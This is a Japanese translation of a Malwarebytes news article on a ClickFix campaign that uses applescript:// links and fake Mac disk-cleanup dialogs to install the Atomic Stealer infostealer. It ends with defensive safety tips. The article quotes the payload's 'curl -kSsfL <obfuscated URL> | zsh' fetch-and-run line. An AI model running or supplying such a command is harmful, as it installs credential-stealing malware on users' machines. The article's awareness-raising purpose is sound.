TokyoBlackHatNews

malwarebytes.com 4分で読了

ClickFixがMacに感染させる新しい方法を発見

多くのMacユーザーがTerminalに特定のコマンドを貼り付けることの危険性を認識するようになったため、ClickFixキャンペーンは現在、別の方法を模索しています。

研究者が発見したところによると、ClickFixは同じ社会工学的な戦術を保持しながら、applescript:// URLスキームを使用してScript Editorを自動的に開き、Atomic Stealerを実行する準備ができたスクリプトを実行することで、Terminalを完全に回避していました。

ClickFixは、ユーザーを騙して自分のデバイスにマルウェアを感染させるための社会工学的手法です。ユーザーは、通常はインフォスティーラーであるマルウェアをダウンロードする特定のコマンドを実行するよう指示されます。

攻撃者は「Terminalにコピーペーストする」を「このボタンをクリックして、Appleが用意したスクリプトを実行するだけ」に置き換えました。

おとりとしては、いつもの「Macのディスク容量を回復する」が使用されます。古い方法を使用した検索結果の1つは次のようなものです:

Image

Terminalで難読化されたcurlコマンドを実行することはいつでも悪い考えです。しかし、その後に続くことも同様に危険であり、ユーザーがこのフローに従う可能性が高いと予想します。

新しい方法はより次のようなものに見えます:

Image

重要な違いは実行の開始方法にあります。怖いコマンドをペーストするよう求める代わりに、サイトはあなたのMacをクリーンアップすると主張し、偽の「24.7GB解放」ダイアログを表示する、ワンクリックの「Appleスクリプト」を提供します。

内部的には、applescript:// ディープリンクは、事前に入力された「メンテナンス」スクリプトを使用してScript Editorを開きます。しかし、スクリプトの実際の仕事は do shell script "curl -kSsfL <難読化されたURL> | zsh"です。これは効果的に第2段階のスクリプトを実行し、別のスクリプトをデコードし、最終的にヘルパー(Atomic Stealerバリアント)をダウンロードして実行します。

Atomic Stealerは、AMOSとも呼ばれ、macOS用の一般的なインフォスティーラーです。しかし、Atomic Stealerは現在のペイロードに過ぎません。明日はMacSync、Infiniti、または何か新しいものになる可能性があります。

結局のところ、ユーザーはダイアログをクリックしてスクリプトを実行することで、すべての権限を付与しているため、依然として自分で引き起こした感染です。

安全を保つ方法

報道によると、ClickFixは2025年のすべてのマルウェアローダーアクティビティの半分以上を担当していました。その成功の理由の1つは、キャンペーンがユーザーを騙すための新しい方法を追加し続け、検出を回避するためのさまざまなコマンドを追加し続けていることです。

macOS Tahoeのユーザーは、OSが最新版(26.4以降)の場合、これらのスクリプトの使用に対して警告を受けます

したがって、ClickFixが猛威を振るい、常に新しい方法を発明しているため、認識し、慎重で、保護されることが重要です。

  • ペースを落としてください。 特にデバイスでコマンドを実行するか、コードをコピーペーストするよう求める場合は、Webページまたはプロンプトの指示に急いで従わないでください。攻撃者は緊迫感に依存してあなたの批判的思考をバイパスするため、即座の行動を促すページに注意してください。高度なClickFixページでは、カウントダウン、ユーザーカウンター、またはその他の圧力戦術を追加して、迅速に行動するようにします。
  • 信頼されていないソースからコマンドやスクリプトを実行することを避けてください。 ソースを信頼し、アクションの目的を理解していない限り、ウェブサイト、メール、またはメッセージからコピーされたコードやコマンドを実行しないでください。指示を独立して確認してください。Webサイトがコマンドの実行または技術的なアクションの実行を指示する場合は、進行する前に公式ドキュメントを確認するか、サポートに連絡してください。
  • コマンドのコピーペーストの使用を制限してください。 コピーペーストする代わりに手動でコマンドを入力すると、コピーされたテキストに隠されている悪意のあるペイロードを無意識のうちに実行するリスクを減らすことができます。
  • デバイスを保護してください。 Webセキュリティコンポーネント付きの最新のリアルタイムアンチマルウェアソリューションを使用してください
  • 進化する攻撃技術について学んでください。 攻撃が予期しないベクトルから来る可能性があり、進化することを理解することは、警戒を維持するのに役立ちます。私たちのブログを読み続けてください!

プロのヒント: 無料のMalwarebytes Browser Guard拡張機能が、ウェブサイトがあなたのクリップボードに何かをコピーしようとしているときにあなたに警告することを知っていましたか?

翻訳元: https://www.malwarebytes.com/blog/news/2026/04/clickfix-finds-new-way-to-infect-macs

ソース: malwarebytes.com
#Atomic Stealer #ClickFix #MacOS #Mac感染 #Script Editor #インフォスティーラー #セキュリティ脅威 #マルウェア #情報盗聴 #社会工学

関連記事

PDFを開くだけでこのAdobe Readerのゼロデイが発動する可能性

偽のClaudeサイトがマルウェアをインストールして攻撃者にコンピューターへのアクセスを与える

詐欺師がAmazonサポートになりすましてあなたのアカウントを盗む